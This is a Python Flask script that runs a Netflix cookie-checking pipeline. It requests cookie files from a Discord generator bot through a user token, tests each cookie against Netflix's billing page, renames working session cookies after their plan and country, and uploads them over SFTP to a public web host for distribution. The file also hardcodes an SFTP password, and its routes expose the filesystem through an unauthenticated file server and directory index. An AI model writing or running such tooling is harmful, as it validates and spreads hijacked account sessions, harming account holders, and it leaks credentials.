import fileinput
import glob
import json
import os
import random
import re
import shutil
import string
import sys
import time
from threading import Thread
from urllib.parse import unquote

import paramiko
import requests
from bs4 import BeautifulSoup
from deep_translator import GoogleTranslator
from flask import Flask, abort, render_template, request, send_file
from flask_autoindex import AutoIndex
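
# Overview: this script automates a Netflix cookie-checking pipeline.
# It asks a Discord bot for fresh cookie files ("c.gen netflix"), downloads
# the newest attachment, normalises it to Netscape cookie format, probes
# https://www.netflix.com/BillingActivity with it, renames working cookies
# after their plan/billing details, uploads them over SFTP, and exposes the
# individual steps as routes on a small Flask app.

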
class Unbuffered(object):
    """Wrap a stream so every write is flushed immediately, keeping log
    output visible in real time on buffered hosts."""

    def __init__(self, stream):
        self.stream = stream

    def write(self, data):
        self.stream.write(data)
        self.stream.flush()

    def writelines(self, datas):
        self.stream.writelines(datas)
        self.stream.flush()

    def __getattr__(self, attr):
        # Delegate everything else to the wrapped stream.
        return getattr(self.stream, attr)


sys.stdout = Unbuffered(sys.stdout)


def send_retrieve_cookie_msg(channelid):
    """Ask the generator bot for a Netflix cookie, then download the newest
    attachment from `channelid` into ./cookies/."""
    print("getting cookie")
    secret = os.environ['DISCORD_CODE']

    data = {"content": "c.gen netflix"}
    headers = {"authorization": secret}
    # The generation command always goes to the bot's command channel;
    # the reply is read back from `channelid`.
    r = requests.post(
        "https://discord.com/api/v9/channels/1263391336594276356/messages",
        data=data,
        headers=headers)
    time.sleep(10)

    os.chdir("./cookies/")
    if r.status_code != 429:
        r = requests.get(
            f'https://discord.com/api/v9/channels/{channelid}/messages?limit=1',
            headers=headers)
        messages = json.loads(r.text)

        for message in messages:
            ran = ''.join(
                random.choices(string.ascii_uppercase + string.digits, k=6))
            try:
                attachmentUrl = message['attachments'][0]['url']
                filename = ran + ".txt"
                response = requests.get(attachmentUrl)
                with open("old" + filename, "wb") as f:
                    f.write(response.content)
                # Rewrite the download: skip blank lines and make sure the
                # file starts with the Netscape cookie-file header.
                needsHeader = True
                with open("old" + filename, 'r') as src, \
                        open(filename, 'w') as out:
                    for line in src:
                        if line.strip():
                            if needsHeader:
                                out.write("# Netscape HTTP Cookie File\n")
                                needsHeader = False
                            out.write(line)
                os.remove("old" + filename)
            except Exception as e:
                print(e)
    else:
        print("cooldown")

    os.chdir("../")


def parseCookieFile(cookiefile):
    """Parse a Netscape cookies.txt file and return a dict of name/value
    pairs compatible with requests."""
    cookies = {}
    with open(cookiefile, 'r') as fp:
        for line in fp:
            if not line.startswith('#'):
                fields = line.strip().split('\t')
                try:
                    cookies[fields[5]] = fields[6]
                except IndexError:
                    print("Invalid cookie")
    return cookies
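
# Usage sketch (mirrors how getNetflixInfo consumes the result):
#   cookies = parseCookieFile("cookie.txt")
#   requests.get("https://www.netflix.com/browse", cookies=cookies)

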
def fixCookie(cookiefile):
    """Truncate the cookie file in place at the first line starting with
    '======', dropping that line and everything after it."""
    for line in fileinput.FileInput(cookiefile, inplace=1):
        if re.match("======", line):
            break
        print(line.replace("\n", ""))


def getNetflixInfo(cookiefile):
    """Probe the Netflix billing page with the given cookie file.  Working
    cookies are renamed after their plan details and uploaded over SFTP;
    dead ones are deleted or moved to ../NoMembership/."""
    cookies = parseCookieFile(cookiefile)

    r = requests.get("https://www.netflix.com/BillingActivity",
                     cookies=cookies)
    print(r.url)
    if "login" in r.url:
        # Netflix bounced us to the login page: the cookie is dead.
        print("Login Page")
        os.remove(cookiefile)
        return

    soup = BeautifulSoup(r.content, "html.parser")
    try:
        billingDate = soup.find("div", {"data-uia": "streaming-next-cycle"})
        netflixLocation = soup.find("div", {"data-uia": "loc"})['lang']
        print(netflixLocation)
        print(billingDate)
        try:
            billingDate = billingDate.get_text()
        except AttributeError:
            billingDate = " "

        planName = soup.find("div", {"data-uia": "plan-name"}).get_text()
        billingDate = GoogleTranslator(source='auto',
                                       target='en').translate(billingDate)
        lang = "English" if soup.find("html", {"lang": 'en'}) else ""
        planName = GoogleTranslator(source='auto',
                                    target='en').translate(planName)

        print(billingDate + " " + planName + " " + lang + " " +
              str(netflixLocation))

        # Check whether the Extra Member feature is offered for this
        # account's country (the help page is keyed by country code).
        extraMember = ""
        try:
            country = netflixLocation[netflixLocation.find("-") + 1:]
            x = requests.get("https://help.netflix.com/en/node/123279/" +
                             country)
            helpSoup = BeautifulSoup(x.content, "html.parser")
            extraMember = "EM Available"
            for p in helpSoup.findAll('p'):
                if p.string and "unavailable" in p.string:
                    extraMember = ""
                    break
        except Exception:
            pass

        ran = ''.join(
            random.choices(string.ascii_uppercase + string.digits, k=3))
        cookieFileName = (billingDate + " " + planName + " " + lang + " " +
                          str(netflixLocation) + " " + extraMember +
                          " (" + ran + ").txt")
        newCookieFile = "../Membership/" + cookieFileName
        shutil.move(cookiefile, newCookieFile)
        fixCookie(newCookieFile)

        ftp, ssh_client = sftp_connect()
        files = ftp.put(
            newCookieFile,
            "./domains/hashir672.serv00.net/public_html/Membership/" +
            cookieFileName)
        print("uploaded ", files)
        ssh_client.close()
        os.remove(newCookieFile)
    except Exception as e:
        print(e)
        with open("../Membership/error.txt", "a") as f:
            f.write(str(e) + "\n\n")
        print("\n Moving in noMember")
        ran = ''.join(
            random.choices(string.ascii_uppercase + string.digits, k=10))
        shutil.move(cookiefile, '../NoMembership/NoMember' + ran + ".txt")


def getNetflixInfoWithApi(cookiefile):
    """Re-download a previously uploaded cookie file from the web host and
    re-check it, pruning it from the server if it no longer works."""
    url = "https://hashir672.serv00.net/Membership/" + str(cookiefile)
    response = requests.get(url)
    if response.status_code == 200:
        with open(cookiefile, "wb") as file:
            file.write(response.content)
        print("File downloaded successfully!")
    else:
        print("Failed to download the file.")
        return "Invalid Link"

    cookies = parseCookieFile(cookiefile)

    r = requests.get("https://www.netflix.com/browse", cookies=cookies)
    print(r.url)
    if "login" in r.url:
        print("Login Page")
        thr = Thread(target=removeCookieFromServer, args=(cookiefile,))
        thr.start()
        return "Not working"
    elif "browse" in r.url:
        return "working"
    else:
        thr = Thread(target=removeCookieFromServer, args=(cookiefile,))
        thr.start()
        return "invalid cookie"


def mainTask():
    print("running cookie retriever")
    send_retrieve_cookie_msg(1239589658309034055)
    time.sleep(5)
    print("running netflix checker")
    os.chdir('./cookies/')
    for fileName in glob.glob("*.txt"):
        print(fileName)
        getNetflixInfo(fileName)
    os.chdir('../')


def testTask():
    os.chdir('./cookietest/')
    getNetflixInfo("./cookie.txt")
    os.chdir("../")


def backupTask(location, filename):
    """Zip `location` and post the archive to the backup Discord channel."""
    shutil.make_archive('./' + filename, 'zip', location)
    header = {
        'authorization': os.environ['DISCORD_CODE'],
    }
    channel_id = "1193267345079156746"
    with open("./" + filename + ".zip", 'rb') as archive:
        files = {
            "file": ("./" + filename + ".zip", archive)
        }
        requests.post(
            f"https://discord.com/api/v9/channels/{channel_id}/messages",
            headers=header,
            files=files)


def sftp_connect():
    """Open an SFTP session to the web host; returns (sftp, ssh_client).
    The caller must close ssh_client when done."""
    ssh_client = paramiko.SSHClient()

    host = "s1.serv00.com"
    username = "hashir672"
    password = "gVlwXbMsxPAA36%!OSIm"
    port = 22

    ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh_client.connect(hostname=host, port=port,
                       username=username, password=password)
    ftp = ssh_client.open_sftp()
    return ftp, ssh_client
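
# Usage sketch (this is the pattern the rest of the file follows):
#   ftp, ssh_client = sftp_connect()
#   ftp.put(local_path, remote_path)   # or ftp.remove(...), ftp.listdir()
#   ssh_client.close()

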
def removeCookieFromServer(cookiefile):
    # Delete the local copy, then the mirrored copy on the web host.
    os.remove(cookiefile)
    ftp, ssh_client = sftp_connect()
    ftp.remove("./domains/hashir672.serv00.net/public_html/Membership/" +
               cookiefile)
    ssh_client.close()


app = Flask(__name__)


@app.route('/', defaults={'req_path': ''})
@app.route('/<path:req_path>')
def dir_listing(req_path):
    """Serve files from ./Membership, or list a directory's contents."""
    BASE_DIR = './Membership'

    abs_path = unquote(os.path.join(BASE_DIR, req_path))

    if os.path.isfile(abs_path):
        return send_file(abs_path)

    if not os.path.exists(abs_path):
        abort(404)

    files = os.listdir(abs_path)
    return render_template('files.html', files=files)


@app.route('/alive')
def alive():
    return "Keep Alive"


@app.route('/main')
def main():
    # Run the full retrieve-and-check pipeline in the background so the
    # request returns immediately.
    thr = Thread(target=mainTask)
    thr.start()
    return 'Hello from Flask!'


@app.route('/check')
def check():
    cookieFile = request.args.get('cookie')
    if not cookieFile:
        # Covers both a missing and an empty ?cookie= parameter.
        cookieFile = "hello"
    print(cookieFile)
    checkCookie = getNetflixInfoWithApi(cookieFile)
    return str(checkCookie)


@app.route('/test')
def test():
    thr = Thread(target=testTask)
    thr.start()
    return 'Hello from Flask! test'


@app.route('/backup')
def backup():
    thr = Thread(target=backupTask, args=("./Membership", "backup"))
    print("backup Start")
    thr.start()
    return 'Backup Started of Membership'


@app.route('/backupNoMembership')
def backupNoMembership():
    thr = Thread(target=backupTask,
                 args=("./NoMembership", "backupNoMembership"))
    thr.start()
    return 'Backup Started of NoMembership'


@app.route('/sftp_test')
def sftp_test():
    # Reuses sftp_connect() instead of duplicating the connection setup.
    ftp, ssh_client = sftp_connect()
    files = ftp.listdir()
    print("Listing all the files and Directory: ", files)
    ssh_client.close()
    return str(files)


ppath = "/"

# Note: browse_root="/" lets AutoIndex browse the entire filesystem root.
AutoIndex(app, browse_root=ppath)
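
# Minimal entry point, assuming the app is launched directly; the original
# file does not start the server itself (a hosting wrapper may do so), so
# the host and port below are placeholder assumptions.
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)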